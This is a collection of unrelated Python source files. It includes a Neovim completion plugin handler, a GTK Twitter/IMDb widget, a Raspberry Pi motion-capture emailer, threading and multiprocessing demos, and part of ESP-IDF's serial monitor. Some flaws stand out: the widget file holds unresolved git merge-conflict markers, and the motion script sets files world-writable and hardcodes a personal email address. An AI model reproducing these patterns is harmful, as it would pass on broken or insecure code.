undotree_seq_cur != self.cached_buffer['undotree_seq_cur']):
self.cached_buffer = {
'bufnr': bufnr,
'undotree_seq_cur': undotree_seq_cur,
'buffer': list(self.nvim.current.buffer),
}
self.run_in_background(self.search_handler, args + [self.cached_buffer['buffer']])
def search_handler(self, event, ctx, opts, x, buf):
if event.is_set():
return
try:
module_name = opts['engine'] if 'engine' in opts else 're'
max_candidates = opts['max_candidates'] if 'max_candidates' in opts else 300
seen = set()
candidates = []
re = importlib.import_module(module_name)
# re2 does not use re.UNICODE by default
pattern = re.compile(x, re.UNICODE)
for line in buf:
if event.is_set():
return
for match in pattern.finditer(line):
if event.is_set():
return
candidate = match.group()
if not candidate in seen:
seen.add(candidate)
candidates.append(candidate)
if max_candidates > 0 and len(candidates) >= max_candidates:
self.queue.put((ctx, candidates,))
return
self.queue.put((ctx, candidates,))
except Exception as e:
self.queue.put((ctx, 'python_search: ' + str(e), 'reject',))
finally:
with self.lock:
self.events.remove(event)
@neovim.function('_wilder_python_uniq', sync=False, allow_nested=True)
def uniq(self, args):
self.run_in_background(self.uniq_handler, args)
def uniq_handler(self, event, ctx, candidates):
if event.is_set():
return
seen = set()
try:
res = [x for x in candidates if not (x in seen or seen.add(x))]
self.queue.put((ctx, res,))
except Exception as e:
self.queue.put((ctx, 'python_uniq: ' + str(e), 'reject',))
@neovim.function('_wilder_python_sort', sync=False, allow_nested=True)
def sort(self, args):
self.run_in_background(self.sort_handler, args)
def sort_handler(self, event, ctx, candidates):
if event.is_set():
return
try:
res = sorted(candidates)
self.queue.put((ctx, res,))
except Exception as e:
self.queue.put((ctx, 'python_sort: ' + str(e), 'reject',))
@neovim.function('_wilder_python_get_file_completion', sync=False)
def get_file_completion(self, args):
if args[2] == 'file_in_path':
path_opt = self.nvim.eval('&path')
directories = path_opt.split(',')
directories += [self.nvim.eval('expand("%:h")')]
elif args[2] == 'shellcmd':
path = os.environ['PATH']
directories = path.split(':')
else:
directories = [self.nvim.eval('getcwd()')]
wildignore_opt = self.nvim.eval('&wildignore')
self.run_in_background(self.get_file_completion_handler, args + [wildignore_opt, directories])
def get_file_completion_handler(self,
event,
ctx,
expand_arg,
expand_type,
has_wildcard,
path_prefix,
wildignore_opt,
directories):
if event.is_set():
return
try:
res = []
wildignore_list = wildignore_opt.split(',')
for directory in directories:
if event.is_set():
return
if not directory:
continue
if has_wildcard:
tail = os.path.basename(expand_arg)
show_hidden = tail.startswith('.')
pattern = ''
wildcard = os.path.join(directory, expand_arg)
wildcard = os.path.expandvars(wildcard)
it = glob.iglob(wildcard, recursive=True)
else:
path = os.path.join(directory, expand_arg)
(head, tail) = os.path.split(path)
show_hidden = tail.startswith('.')
pattern = tail + '*'
try:
it = os.scandir(head)
except FileNotFoundError:
continue
for entry in it:
if event.is_set():
return
try:
if has_wildcard:
entry = Path(entry)
try:
entry = entry.relative_to(directory)
except ValueError:
pass
if entry.name.startswith('.') and not show_hidden:
continue
if expand_type == 'dir' and not entry.is_dir():
continue
ignore = False
for wildignore in wildignore_list:
if fnmatch.fnmatch(entry.name, wildignore):
ignore = True
break
if ignore:
continue
if not has_wildcard and pattern and not fnmatch.fnmatch(entry.name, pattern):
continue
if expand_type == 'shellcmd' and (
not entry.is_file() or not os.access(os.path.join(directory, entry.name), os.X_OK)):
continue
if has_wildcard and Path(entry) == Path(path_prefix):
continue
if entry.is_dir():
res.append((str(entry) if has_wildcard else entry.name) + os.sep)
else:
res.append(str(entry) if has_wildcard else entry.name)
except OSError:
pass
res = sorted(res)
head = os.path.dirname(expand_arg)
if not has_wildcard:
res = list(map(lambda f: os.path.join(head, f) if head else f, res))
if expand_arg == '.':
res.insert(0, '../')
res.insert(0, './')
elif expand_arg == '..':
res.insert(0, '../')
self.queue.put((ctx, res,))
except Exception as e:
self.queue.put((ctx, 'python_get_file_completion: ' + str(e), 'reject',))
def get_basename(self, f):
if f.endswith(os.sep) or f.endswith('/'):
return os.path.basename(f[:-1])
return os.path.basename(f)
@neovim.function('_wilder_python_get_users', sync=False, allow_nested=True)
def get_users(self, args):
self.run_in_background(self.get_users_handler, args)
def get_users_handler(self, event, ctx, expand_arg, expand_type):
if event.is_set():
return
try:
res = []
for user in pwd.getpwall():
if user.pw_name.startswith(expand_arg):
res.append(user.pw_name)
res = sorted(res)
self.queue.put((ctx, res,))
except Exception as e:
self.queue.put((ctx, 'python_get_users: ' + str(e), 'reject',))
@neovim.function('_wilder_python_filter', sync=False, allow_nested=True)
def filter(self, args):
self.run_in_background(self.filter_handler, args)
def filter_handler(self, event, ctx, pattern, candidates, engine, has_file_args):
if event.is_set():
return
try:
re = importlib.import_module(engine)
# re2 does not use re.UNICODE by default
pattern = re.compile(pattern, re.UNICODE)
res = filter(lambda x: pattern.search(x if not has_file_args else self.get_basename(x)), candidates)
self.queue.put((ctx, list(res),))
except Exception as e:
self.queue.put((ctx, 'python_filter: ' + str(e), 'reject',))
@neovim.function('_wilder_python_sort_difflib', sync=False, allow_nested=True)
def sort_difflib(self, args):
self.run_in_background(self.sort_difflib_handler, args)
def sort_difflib_handler(self, event, ctx, candidates, query, quick=True):
if event.is_set():
return
try:
if quick:
res = sorted(candidates, key=lambda x: -difflib.SequenceMatcher(
None, x, query).quick_ratio())
else:
res = sorted(candidates, key=lambda x: -difflib.SequenceMatcher(
None, x, query).ratio())
self.queue.put((ctx, list(res),))
except Exception as e:
self.queue.put((ctx, 'python_sort_difflib: ' + str(e), 'reject',))
@neovim.function('_wilder_python_sort_fuzzywuzzy', sync=False, allow_nested=True)
def sort_fuzzywuzzy(self, args):
self.run_in_background(self.sort_fuzzywuzzy_handler, args)
def sort_fuzzywuzzy_handler(self, event, ctx, candidates, query, partial=True):
if event.is_set():
return
try:
fuzzy = importlib.import_module('fuzzywuzzy.fuzz')
if partial:
res = sorted(candidates, key=lambda x: -fuzzy.partial_ratio(x, query))
else:
res = sorted(candidates, key=lambda x: -fuzzy.ratio(x, query))
self.queue.put((ctx, list(res),))
except Exception as e:
self.queue.put((ctx, 'python_sort_fuzzywuzzy: ' + str(e), 'reject',))
@neovim.function('_wilder_python_common_subsequence_spans', sync=True)
def common_subsequence_spans(self, args):
string = args[0]
query = args[1]
case_sensitive = args[2]
if not case_sensitive:
string = string.upper()
query = query.upper()
result = []
blocks = difflib.SequenceMatcher(None, string, query).get_matching_blocks()
for block in blocks[: -1]:
start = block.a
end = block.a + block.size
byte_start = len(string[: start].encode('utf-8'))
byte_len = len(string[start : end].encode('utf-8'))
result.append([byte_start, byte_len])
return result
@neovim.function('_wilder_python_pcre2_capture_spans', sync=True)
def capture_spans(self, args):
pattern = args[0]
string = args[1]
module_name = args[2]
re = importlib.import_module(module_name)
match = re.match(pattern, string)
if not match or not match.lastindex:
return []
captures = []
for i in range(1, match.lastindex + 1):
start = match.start(i)
end = match.end(i)
if start == -1 or end == -1 or start == end:
continue
byte_start = len(string[: start].encode('utf-8'))
byte_len = len(string[start : end].encode('utf-8'))
captures.append([byte_start, byte_len])
return captures
|
deskwid.py
|
"""
Author : Jay Rambhia
email : jayrambhia777@gmail.com
Git : https://github.com/jayrambhia
gist : https://gist.github.com/jayrambhia
=============================================
Name : deskwid
Repo : DeskWid
Git : https://github.com/jayrambhia/DeskWid
version 0.1
"""
# Copyright (c) 2012 Jay Rambhia
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import pygtk
import gtk
from threading import Thread
import gobject
import os
import twitter
import imdb
import time
import deskwidutils
gtk.gdk.threads_init()
class DeskwidWindow:
def __init__(self, api):
self.api = api
self.timeline_flag = False
self.timeline_interval = 2
self.window = gtk.Window()
self.window.set_title("DeskWid")
self.window.set_size_request(1000,700)
self.window.connect("destroy", self.close_application)
self.box = gtk.VBox(False, 2)
self.window.add(self.box)
self.box.show()
self.statusbox = gtk.HBox(False, 2)
self.statusbox.set_size_request(1000,30)
self.box.pack_start(self.statusbox)
self.statusbox.show()
self.statusentry = gtk.Entry()
self.statusentry.set_size_request(900,30)
self.statusentry.connect("activate", self.getcommand)
self.statusbox.pack_start(self.statusentry, False, False, 5)
self.statusentry.show()
self.button = gtk.Button("command")
self.button.set_size_request(80,30)
self.button.connect('clicked', self.getcommand)
self.statusbox.pack_start(self.button, False, False, 3)
self.button.show()
self.box1 = gtk.HBox(False, 2)
self.box.pack_start(self.box1, False, False, 3)
self.box1.show()
self.genbox = gtk.VBox(False, 2)
self.genbox.set_size_request(680, 650)
self.box1.pack_start(self.genbox, False, False, 2)
self.genbox.show()
if self.api is None:
self.genlabel = gtk.Label("DeskWid 0.1 -- Some of your Twitter API keys might be incorrect")
else:
self.genlabel = gtk.Label("DeskWid 0.1")
self.genlabel.set_size_request(680,30)
self.genbox.pack_start(self.genlabel)
self.genlabel.show()
self.sw1 = gtk.ScrolledWindow()
self.sw1.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.sw1.show()
self.genbox.pack_start(self.sw1, False, False, 2)
self.genview = gtk.TextView()
self.genview.set_size_request(680,610)
self.genview.set_editable(False)
self.genview.set_wrap_mode(gtk.WRAP_WORD)
self.genbuffer = self.genview.get_buffer()
self.sw1.add(self.genview)
self.genview.show()
self.notebox = gtk.EventBox()
self.notebox.set_size_request(300, 650)
self.notebox.connect('leave_notify_event',self.savenote)
self.box1.pack_start(self.notebox, False, False, 2)
self.notebox.show()
self.sw2 = gtk.ScrolledWindow()
self.sw2.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.sw2.show()
self.notebox.add(self.sw2)
self.notebook = gtk.TextView()
self.notebook.set_size_request(300, 580)
self.notebook.set_wrap_mode(gtk.WRAP_WORD)
self.notebuffer = self.notebook.get_buffer()
if os.path.isfile(os.path.join(os.getcwd(),'stickynote.txt')):
infile = open('stickynote.txt','r')
if infile:
text = infile.read()
infile.close()
self.notebuffer.set_text(text)
self.sw2.add(self.notebook)
self.notebook.show()
self.window.show()
def close_application(self, widget=None, data=None):
self.savenote()
self.timeline_flag = False
gtk.main_quit()
def savenote(self, widget=None, data=None):
file = open('stickynote.txt','w')
startiter = self.notebuffer.get_start_iter()
enditer = self.notebuffer.get_end_iter()
text = self.notebuffer.get_text(startiter, enditer)
file.write(text)
file.close()
def getcommand(self, widget, data=None):
command = self.statusentry.get_text()
if command.startswith("\\t "):
status = "\\t ".join(command.split("\\t ")[1:])
if len(status) > 140:
text = "Should not be more than 140 characters"
gobject.idle_add(self.change_genlabel, text)
else:
gobject.idle_add(self.change_genlabel, "tweeting..")
self.set_status_thread(status)
elif command.startswith("\imdb "):
gobject.idle_add(self.change_genlabel, "Fetching movie details from IMDb")
self.fetch_movie_thread()
elif command.startswith("\\timeline"):
subcom = command.split("\\timeline ")[-1]
if subcom.isdigit():
self.timeline_interval = int(subcom)
if self.timeline_interval < 1:
self.timeline_interval = 1
if self.timeline_flag is False:
self.timeline_flag = True
self.get_timeline_thread()
elif "stop" in subcom:
if self.timeline_flag is True:
self.timeline_flag = False
gobject.idle_add(self.change_genlabel, 'Timeline stopped')
else:
subcom = 2
if self.timeline_flag is False:
self.timeline_flag = True
self.get_timeline_thread()
elif command.startswith("--proxy"):
print self.setproxy(command)
gobject.idle_add(self.change_genlabel, 'New Proxy set')
elif command.startswith("--consumer_key"):
deskwidutils.setconsumerkey(command.split()[-1])
gobject.idle_add(self.change_genlabel, 'Consumer Key set')
elif command.startswith("--consumer_secret"):
deskwidutils.setconsumersecret(command.split()[-1])
gobject.idle_add(self.change_genlabel, 'Consumer Secret set')
elif command.startswith("--access_token_key"):
deskwidutils.setaccesstokenkey(command.split()[-1])
gobject.idle_add(self.change_genlabel, 'Access Token set')
elif command.startswith("--access_token_secret"):
deskwidutils.setaccesstokensecret(command.split()[-1])
gobject.idle_add(self.change_genlabel, 'Access Token Secret set')
#elif command.startswith("quit") or command.startswith("exit"):
# self.close_application()
else:
gobject.idle_add(self.change_genlabel, "No such command")
return
self.statusentry.set_text("")
def get_timeline_thread(self):
self.timeline_thread = Thread(target=self.get_timeline).start()
def get_timeline(self):
since_id = None
while self.timeline_flag:
timeline=''
tweet_list=[]
tweet_str=''
try:
gobject.idle_add(self.change_genlabel, 'fetching timeline')
timeline = self.api.GetFriendsTimeline(since_id = since_id)
#timeline = self.api.friends_timeline(since_id = since_id)
if timeline:
for i in range(len(timeline)-1,-1,-1):
tweet = deskwidutils.gettweet(timeline[i])
tweet_list.append(tweet)
tweet_str = tweet_str + tweet + '\n'
gobject.idle_add(self.set_genview, tweet)
since_id = timeline[0].id
<<<<<<< HEAD:deskwid/deskwid.py
print since_id
gobject.idle_add(self.change_genlabel, 'timeline')
=======
gobject.idle_add(self.change_genlabel, 'timeline')
# print since_id
>>>>>>> 7e9a838c0063c5023012521c641c1a867f43352a:deskwid.py
except :
# print 'Got some error'
gobject.idle_add(self.change_genlabel, 'Unable to fetch timeline')
#gobject.idle_add(self.set_genview, tweet_str)
time.sleep(self.timeline_interval*60)
def set_status_thread(self, status):
Thread(target=self.set_status, args=(status,)).start()
def set_status(self, status):
try:
status_ob = self.api.PostUpdate(status)
#print "tweeted"
gobject.idle_add(self.change_genlabel, 'Tweeted')
self.statusentry.set_text('')
except:
gobject.idle_add(self.change_genlabel, 'Got some error')
#print "Error"
def fetch_movie_thread(self):
Thread(target=self.fetch_movie).start()
def fetch_movie(self):
query = self.statusentry.get_text().split("\imdb ")[-1]
print query
self.movie = imdb.Movie(query)
text = deskwidutils.get_movie_detail(self.movie)
gobject.idle_add(self.set_genview, text)
gobject.idle_add(self.change_genlabel, self.movie.title)
self.statusentry.set_text("")
return
def change_genlabel(self, text):
self.genlabel.set_text(text+" - DeskWid 0.1")
def set_genview(self, text):
startiter = self.genbuffer.get_start_iter()
enditer = self.genbuffer.get_end_iter()
pretext = self.genbuffer.get_text(startiter, enditer)
line = "\n"+180*"-"+"\n"
text = line.join([text, pretext])
self.genbuffer.set_text(text)
def setproxy(self, command):
return deskwidutils.setproxy(command)
def deskwid():
proxy = deskwidutils.getproxy()
consumer_key = deskwidutils.getconsumerkey()
consumer_secret = deskwidutils.getconsumersecret()
access_token_key = deskwidutils.getaccesstokenkey()
access_token_secret = deskwidutils.getaccesstokensecret()
api = twitter.Api(consumer_key, consumer_secret,access_token_key, access_token_secret, proxy=proxy)
DeskwidWindow(api)
gtk.main()
|
motion.py
|
#!/usr/bin/python
import StringIO
import subprocess
import os
import time
import smtplib
from datetime import datetime
from PIL import Image
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
from threading import Thread
#from threadPool import ThreadPool
# Motion detection settings:
# Threshold (how much a pixel has to change by to be marked as "changed")
# Sensitivity (how many changed pixels before capturing an image)
# ForceCapture (whether to force an image to be captured every forceCaptureTime seconds)
threshold = 10
sensitivity = 20
forceCapture = True
forceCaptureTime = 60 * 60 # Once an hour
# File settings
saveWidth = 1280
saveHeight = 960
diskSpaceToReserve = 1000 * 1024 * 1024 # Keep 1000 mb free on disk
# Capture a small test image (for motion detection)
def captureTestImage():
command = "raspistill -w %s -h %s -t 0 -e bmp -o -" % (100, 75)
imageData = StringIO.StringIO()
imageData.write(subprocess.check_output(command, shell=True))
imageData.seek(0)
im = Image.open(imageData)
buffer = im.load()
imageData.close()
return im, buffer
# Save a full size image to disk
def saveImage(width, height, diskSpaceToReserve):
keepDiskSpaceFree(diskSpaceToReserve)
if not os.path.exists("images/"):
os.makedirs("images/")
os.chmod("images/",0777)
time = datetime.now()
filename = "images/capture-%04d%02d%02d-%02d%02d%02d.jpg" % (time.year, time.month, time.day, time.hour, time.minute, time.second)
subprocess.call("raspistill -w 1296 -h 972 -t 0 -e jpg -q 15 -o %s" % filename, shell=True)
os.chmod(filename,0777)
print "Captured %s" % filename
return filename
# Keep free space above given level
def keepDiskSpaceFree(bytesToReserve):
if (getFreeSpace() < bytesToReserve):
for filename in sorted(os.listdir(".")):
if filename.startswith("capture") and filename.endswith(".jpg"):
os.remove(filename)
print "Deleted %s to avoid filling disk" % filename
if (getFreeSpace() > bytesToReserve):
return
# Get available disk space
def getFreeSpace():
st = os.statvfs(".")
du = st.f_bavail * st.f_frsize
return du
def sendGmail(attachment):
fromaddr = 'itai.agmon@gmail.com'
toaddrs = ['itai.agmon@gmail.com']
subject="Motion was detected "
# Credentials (if needed)
username = 'itai.agmon'
password = ''
# The actual mail send
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username,password)
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = COMMASPACE.join(toaddrs)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach( MIMEText("Motion was detected!") )
part = MIMEBase('application', "octet-stream")
part.set_payload( open(attachment,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(attachment))
msg.attach(part)
server.sendmail(fromaddr, toaddrs, msg.as_string())
server.quit()
# Get first image
image1, buffer1 = captureTestImage()
# Reset last capture time
lastCapture = time.time()
print "Started motion detection"
while (True):
# Get comparison image
image2, buffer2 = captureTestImage()
# Count changed pixels
changedPixels = 0
#pool = ThreadPool(20)
for x in xrange(0, 100):
for y in xrange(0, 75):
# Just check green channel as it's the highest quality channel
pixdiff = abs(buffer1[x,y][1] - buffer2[x,y][1])
if pixdiff > threshold:
changedPixels += 1
# Check force capture
if forceCapture:
if time.time() - lastCapture > forceCaptureTime:
changedPixels = sensitivity + 1
# Save an image if pixels changed
if changedPixels > sensitivity:
lastCapture = time.time()
fileName = saveImage(saveWidth, saveHeight, diskSpaceToReserve)
#pool.add_task(sendGmail,fileName)
#Ucomment this for sending mails
#thread = Thread(target = sendGmail, args = (fileName, ))
#thread.start()
# Swap comparison buffers
image1 = image2
buffer1 = buffer2
|
safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
transfer_lock = RLock()
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
with transfer_lock:
from_account.balance -= amount
time.sleep(.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
with transfer_lock:
current = sum(a.balance for a in accounts)
if current != total:
print("ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
), flush=True)
elif not quiet:
print("All good: Consistent account balance: ${:,}".format(
total), flush=True)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == '__main__':
main()
|
multiprocessing_module.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
multiprocessing.dummy
multiprocessing.dummy.Pool
"""
"""
from threading import Event,Thread
def f(e):
print('f 0')
e.wait()
print('f 1')
e = Event()
t = Thread(target=f,args=(e,))
t.start()
e.set()
e.clear()
"""
"""
import threading
l = threading.local()
l.x = 1
def f():
print(l.x)
f()
#threading.Thread(target=f).start()
def f():
l.x = 5
threading.Thread(target=f).start()
"""
"""
from concurrent.futures import ThreadPoolExecutor
executor = ThreadPoolExecutor(3)
def f(a,b):
print('f',a,b)
return a ** b
executor.submit(f,2,3)
future = executor.submit(f,2,4)
print(future.result())
# 同时调用多个线程
executor.map(f,[2,3,5],[4,5,6])
import time
def f(a,b):
print('f',a,b)
time.sleep(10)
return a ** b
print(executor.map(f,[2,3,5,6,7],[4,5,6,7,8]))
"""
'''
from multiprocessing import Process
def f(s):
print(s)
p = Process(target=f,args=('hello',))
p.start()
'''
'''
from multiprocessing import Process
x = 1
def f():
global x
x = 5
f()
print(x)
x = 1
p = Process(target=f)
p.start()
print(x)
'''
"""
from multiprocessing import Queue,Pipe,Process
q = Queue()
q.put(1)
print(q.get())
def f(q):
print('start')
print(q.get())
print('end')
Process(target=f,args=(q,)).start()
print(q.put(100))
"""
"""
from multiprocessing import Queue,Pipe,Process
c1,c2 = Pipe()
c1.send('abc')
print(c2.recv())
c2.send('xyz')
print(c1.recv())
def f(c):
c.send(c.recv() * 2)
c1,c2 = Pipe()
Process(target=f,args=(c2,)).start()
c1.send(55)
print(c1.recv())
"""
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make flash" (Ctrl-T Ctrl-F)
# - Run "make app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix':
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
import fcntl, termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except:
pass
class LineMatcher:
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace(b"\n", b"\r\n"),
"CR": lambda c: c.replace(b"\n", b"\r"),
"LF": lambda c: c.replace(b"\r", b"\n"),
}[eol]
# internal state
